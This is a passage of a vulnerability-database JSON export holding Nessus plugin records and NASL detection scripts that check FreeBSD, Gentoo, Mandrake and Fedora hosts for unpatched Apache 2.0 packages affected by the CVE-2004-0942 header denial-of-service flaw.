"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:25:36", "edition": 1, "description": "The following package needs to be updated: apache", "published": "2004-11-23T00:00:00", "type": "nessus", "title": "FreeBSD : apache2 multiple space header denial-of-service vulnerability (9)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "modified": "2004-11-23T00:00:00", "id": "FREEBSD_APACHE2_2052_2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15796", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_282dfea0337811d9b404000c6e8f12ef.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(15796);\n script_version(\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2004-0942\");\n\n script_name(english:\"FreeBSD : apache2 multiple space header denial-of-service vulnerability (9)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: apache');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495432\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=482\nhttp://secunia.com/advisories/30916/\nhttp://secunia.com/advisories/31519\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-37.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-38.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-39.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-40.html\nhttp://www.php.net/ChangeLog-5.php#5.2.7\nhttp://www.sektioneins.de/advisories/SE-2008-06.txt');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/282dfea0-3378-11d9-b404-000c6e8f12ef.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/11/23\");\n script_end_attributes();\n script_summary(english:\"Check for apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37058 (freebsd_pkg_282dfea0337811d9b404000c6e8f12ef.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=5;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"apache>2.*<=2.0.52_2\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2021-01-07T10:40:46", "description": "It is possible for remote attackers to cause a denial-of-service\nscenario on Apache 2.0.52 and earlier by sending an HTTP GET request\nwith a MIME header containing multiple lines full of whitespaces.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "FreeBSD : apache2 multiple space header denial-of-service vulnerability (282dfea0-3378-11d9-b404-000c6e8f12ef)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache"], "id": "FREEBSD_PKG_282DFEA0337811D9B404000C6E8F12EF.NASL", "href": "https://www.tenable.com/plugins/nessus/37058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37058);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0942\");\n\n script_name(english:\"FreeBSD : apache2 multiple space header denial-of-service vulnerability (282dfea0-3378-11d9-b404-000c6e8f12ef)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It is possible for remote attackers to cause a denial-of-service\nscenario on Apache 2.0.52 and earlier by sending an HTTP GET request\nwith a MIME header containing multiple lines full of whitespaces.\"\n );\n # http://marc.theaimsgroup.com/?l=full-disclosure&m=109930632317208\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=full-disclosure&m=109930632317208\"\n );\n # https://vuxml.freebsd.org/freebsd/282dfea0-3378-11d9-b404-000c6e8f12ef.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?801bc01a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache>2.*<=2.0.52_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:51:53", "description": "The remote host is affected by the vulnerability described in GLSA-200411-18\n(Apache 2.0: Denial of Service by memory consumption)\n\n Chintan Trivedi discovered a vulnerability in Apache httpd 2.0 that is caused by improper enforcing of the field length limit in the header-parsing code.\n \nImpact :\n\n By sending a large amount of specially crafted HTTP GET requests a remote attacker could cause a Denial of Service of the targeted system.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2004-11-13T00:00:00", "title": "GLSA-200411-18 : Apache 2.0: Denial of Service by memory consumption", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "modified": "2004-11-13T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200411-18.NASL", "href": "https://www.tenable.com/plugins/nessus/15693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200411-18.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15693);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0942\");\n script_xref(name:\"GLSA\", value:\"200411-18\");\n\n script_name(english:\"GLSA-200411-18 : Apache 2.0: Denial of Service by memory consumption\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200411-18\n(Apache 2.0: Denial of Service by memory consumption)\n\n Chintan Trivedi discovered a vulnerability in Apache httpd 2.0 that is caused by improper enforcing of the field length limit in the header-parsing code.\n \nImpact :\n\n By sending a large amount of specially crafted HTTP GET requests a remote attacker could cause a Denial of Service of the targeted system.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/features/security-20\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200411-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache 2.0 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.0.52-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.0.52-r1\", \"lt 2.0\"), vulnerable:make_list(\"lt 2.0.52-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache 2.0\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:51:23", "description": "A vulnerability in apache 2.0.35-2.0.52 was discovered by Chintan\nTrivedi; he found that by sending a large amount of specially- crafted\nHTTP GET requests, a remote attacker could cause a Denial of Service\non the httpd server. This vulnerability is due to improper enforcement\nof the field length limit in the header-parsing code.\n\nThe updated packages have been patched to prevent this problem.", "edition": 25, "published": "2004-11-17T00:00:00", "title": "Mandrake Linux Security Advisory : apache2 (MDKSA-2004:135)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "modified": "2004-11-17T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache2-mod_dav", "p-cpe:/a:mandriva:linux:apache2-mod_ssl", "p-cpe:/a:mandriva:linux:apache2-mod_ldap", "p-cpe:/a:mandriva:linux:apache2", "p-cpe:/a:mandriva:linux:lib64apr0", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:apache2-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache2-common", "p-cpe:/a:mandriva:linux:apache2-devel", "p-cpe:/a:mandriva:linux:apache2-modules", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:apache2-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache2-manual", "p-cpe:/a:mandriva:linux:apache2-mod_file_cache", "p-cpe:/a:mandriva:linux:apache2-mod_proxy", "p-cpe:/a:mandriva:linux:apache2-mod_cache", "p-cpe:/a:mandriva:linux:libapr0", "p-cpe:/a:mandriva:linux:apache2-mod_deflate", "p-cpe:/a:mandriva:linux:apache2-worker", "p-cpe:/a:mandriva:linux:apache2-source"], "id": "MANDRAKE_MDKSA-2004-135.NASL", "href": "https://www.tenable.com/plugins/nessus/15740", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:135. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15740);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0942\");\n script_xref(name:\"MDKSA\", value:\"2004:135\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache2 (MDKSA-2004:135)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability in apache 2.0.35-2.0.52 was discovered by Chintan\nTrivedi; he found that by sending a large amount of specially- crafted\nHTTP GET requests, a remote attacker could cause a Denial of Service\non the httpd server. This vulnerability is due to improper enforcement\nof the field length limit in the header-parsing code.\n\nThe updated packages have been patched to prevent this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.archive.org/web/20120208022923/http://xforce.iss.net:80/xforce/xfdb/17930\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-common-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-devel-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-manual-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_cache-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_dav-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_deflate-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_disk_cache-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_file_cache-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_ldap-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_mem_cache-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_proxy-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_ssl-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-modules-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-source-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64apr0-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libapr0-2.0.48-6.8.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-common-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-devel-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-manual-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_cache-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_dav-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_deflate-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_disk_cache-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_file_cache-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_ldap-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_mem_cache-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-mod_proxy-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-modules-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-source-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache2-worker-2.0.50-7.2.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-common-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-devel-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-manual-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_cache-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_dav-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_deflate-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_disk_cache-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_file_cache-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_ldap-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_mem_cache-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_proxy-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_ssl-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-modules-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-source-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64apr0-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libapr0-2.0.47-6.12.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:05:44", "description": "This update includes the fix for a memory consumption denial of\nservice issue in the handling of request header lines (CVE-2004-0942).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2004-11-17T00:00:00", "title": "Fedora Core 3 : httpd-2.0.52-3.1 (2004-421)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "modified": "2004-11-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora_core:3", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "p-cpe:/a:fedoraproject:fedora:httpd-suexec", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", 